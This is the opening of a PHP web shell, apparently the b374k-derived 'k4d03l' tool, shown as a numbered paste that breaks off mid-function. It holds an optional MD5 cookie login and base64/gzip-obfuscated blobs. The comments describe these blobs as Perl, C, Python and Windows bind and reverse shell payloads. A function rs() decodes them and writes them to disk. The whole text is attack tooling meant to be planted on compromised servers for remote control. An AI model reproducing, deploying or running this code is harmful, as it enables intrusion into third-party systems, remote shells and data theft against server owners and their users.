Shell

1. <?php
2.  
3.  
4. $s_name = "k4d03l"; // shell name
5. $s_ver = "w45 h3r3"; // shell ver
6. $s_title = $s_name." ".$s_ver;
7. $s_pass = "MASUKKAN PASS MD5 DISINI";
8. $s_auth = false; // login status
9. if(strlen(trim($s_pass))>0){
10.     if(isset($_COOKIE['b374k'])){
11.         if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true;
12.     }
13.     if(isset($_REQUEST['login'])){
14.         $login = strtolower(trim($_REQUEST['login']));
15.         if(strtolower(trim($s_pass)) == md5($login)){
16.             setcookie("b374k",md5($login),time() + 3600*24*7);
17.             $m = $_SERVER['PHP_SELF'];
18.             header("Location: ".$m);
19.             die();
20.         }
21.         else{
22.             setcookie("b374k",$login,time() - 3600*24*7);
23.             $m = $_SERVER['PHP_SELF'];
24.             header("Location: ".$m);
25.             die();
26.         }
27.     }
28. }
29. else $s_auth = true; // $s_pass variable (password) is empty , go ahead, no login page
30.  
31.  
32. // resources $xback_pl $xbind_pl $xback_c $xbind_c $xmulti_py $wmulti_c... this was used with bind and reverse shell
33. // use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P
34. $xback_pl ="dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0=";
35. $xbind_pl ="bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI=";
36. $xback_c = "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B";
37. $xbind_c = "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw==";
38. $xmulti_py = "lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjwAHJ5DAkwRDgd4gnnlPBXYekgaaIGfYdBgoouUq6jTzQ5Y2gf7CC+7/Yh2sznO/Uf2szGV6ub28myTX+6mH/7vlos7ybjWXPOFWrhSbhSaRv45GSRiHYvpKD0vFJ5VpXK2PMuQZNJC6iEse4g2NJbyfy1+RC6OfCcaA7GEj2m0HyeW0qhQwfk/04lVJGaivOafknecwmqrHkUIAA778EA2QDfSjcrCp1gE9MsByX636qD06r4FI/qHo6Iz1m5tYV6kXR45Iw09+M6HseHbshfRD1+T/gG";
39. $wmulti_c = "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";
40. $favicon = "AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJzTAJiTMFpmkDsgtEn/Y7YHzuMD5BP1R4NF7yy9lgAbxv+3FzqRz2YD7KprJg9BfC92YEQ6sDkHanQG0Uhg5YoKblG6RbBnJchsD7QXQulqIpoEeZWwvDjB731xywzxrwYKUXkk4xxB2i7ymtQuuBGZCjsojRVwTXcysa/TqUTmSh2HMa91a7YZ0qRNVYLgNwQtwmQrJdsJvUSEBUz/8zQNVQ2o/aoAl3VtpQNpmNMxN5cC22w+LRwzSaC8e8DQ2TFiTZBEiuJ46wOYSZe20fQN9V9KW5JOhaakPxuA6uhQ5Y3DpUjuSgZ84G6roSostM1TqiOuY/kPUdWyOauRh7MYiuUD0uMqCeuUZcmWmBsI4PQS0PRA03wjdxmqMCWEmvitekHWI0uGth99RBahPvJQrNvGomUcurSNzkliaAcy6eiApglWoXuZOs/J+CS0xFMxf8Ks6rWAsXd9g2suJf4GzwyhPBPZ9A/BeAFccYv5NoiN+KdvcLtyxxEwhxgvoAAAAASUVORK5CYII=";
41. $style = "tVbJbtswEL33KwgEBVrAMrS4biKfggL9gqLXghIpiwhFChQd2xHy7xUpyhwtdlIgFS+2PJzlvTczziQ5tyjD+dNeyYMg6V1onx0qpNBBw15oGkX1yX0vcMX4Of2FS1nh1W+qCBZ49agY5juUSy5VelcUxQ69orsKMzF2Hdlnh2pMCBP7NK5P6N74Dir5EmRSEaoChQk7NCmKQvPL4ssjI7pMozD8bAOVFHc2Laqw2jORhj5A91HTkw4wZ3uRclpocAFpcuWONymjFgAR2+jA0N8OjjR7YjrQCoumkKpKkZIaa/oliJJ18p3Q/VdX520TGBvhFoDqcPXvNj/uk8efrkRCc6mwZlKkQgpqLNfGEROFbAcYDQJpxyZqJGcEXTy4OrawPENO2J3IvnXedMbbCfzD+wbpjoOSsn2p03hjLj1TpVmOucO/YoTwPrM9PuMVWj8b2ibVWLiPvZtMcmLtreGHYcyp1h0aTY1zV2kvWCoOy4IdeEYGlK405K6szZWKofaC2maQtJfGhEHoP34wZ/c+Qpey/jBIljpws9CAm1HhaSktM7CmZGvOrdTezmzUD2sm6oN+6eRSK1nVuvtAnzHPJaHLbPUpw56OQSWZ1FpWsAuSB3PmE2/Wei6BdlmjPinYIK4hkphWoJjsoNtZvFEtD+bMlHERIuAGlhLbp0/nVHdXJ9lAmYbQzIyVq3NksDED8yqKQ+jLeOz7gDNBg1tTQct6HKT03ZQM3QQBF51SzLoZNdKs7m4aLakzujfHGja0yg7izFpEWFNzfHYF+/nue7ibDoo2B96x9o+7as7RwOVsZECo+qm7pG6nCIwxkIMFu2e0NpxPSDDSLWuzCpDGGb8iisj46LOGF0h7K4/cPt7J1lWze1spMEi5ssQvUbXYbMPFMm7hilfGatTJ38AwTkK308IJtLk5AAiLwWTebie4mMhXSxw4BvZ+bw+Qmb3G6LFgU0IAra5R34Pl4MsyBrf45ub0Gzxc6ZLBa95BSoX2ns3MuqirOmfy9B96I5ruU4uHF3sf2HKx8E/OW14nyj7e1dIfHNX8GZrfu45u7xTgt5BSmzE0lynwtr1MuV62SwqMwVLyvJeqXdwDu9dPfwE=";
42. // http://www.kryogenix.org/code/browser/sorttable/ - this makes the tables sortable
43. $sortable_js = "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";
44.  
45. // make link for folder $pwd and all of its parent folder
46. function swd($p){
47.     $ps = explode(DIRECTORY_SEPARATOR,$p);
48.     $pu = "";
49.     for($i = 0 ; $i < sizeof($ps)-1 ; $i++){
50.         $pz = "";
51.         for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR;
52.         $pu .= "<a href=\"?d=".$pz."\">".$ps[$i]." ".DIRECTORY_SEPARATOR." </a>";
53.     }
54.     return trim($pu);
55. }
56. // remove <br />tags
57. function rp($t){
58.     return trim(str_replace("<br />","",$t));
59. }
60. // replace spaces with underscore ( _ )
61. function cs($t){
62.     return str_replace(" ","_",$t);
63. }
64. // strip slashes,trim and urldecode
65. function ss($t){
66.     if (!get_magic_quotes_gpc()) return trim(urldecode($t));
67.     return trim(urldecode(stripslashes($t)));
68. }
69. // only strip slashes
70. function ssc($t){
71.     if (!get_magic_quotes_gpc()) return $t;
72.     return stripslashes($t);
73. }
74. // bind and reverse shell
75. function rs($s_win, $d, $type, $sc, $target){
76.     $result = "";
77.  
78.     $fc = gzinflate(base64_decode($sc));
79.  
80.     $errperm = "<p class=\"rs_result\">error: permission denied. check current working directory permissions</p>";
81.     $errgcc = "<p class=\"rs_result\">error: can not compile using gcc</p>";
82.  
83.     if($type == "xbind_pl"){
84.         $fname = "b374k_bind.pl";
85.         $fpath = $d.$fname;
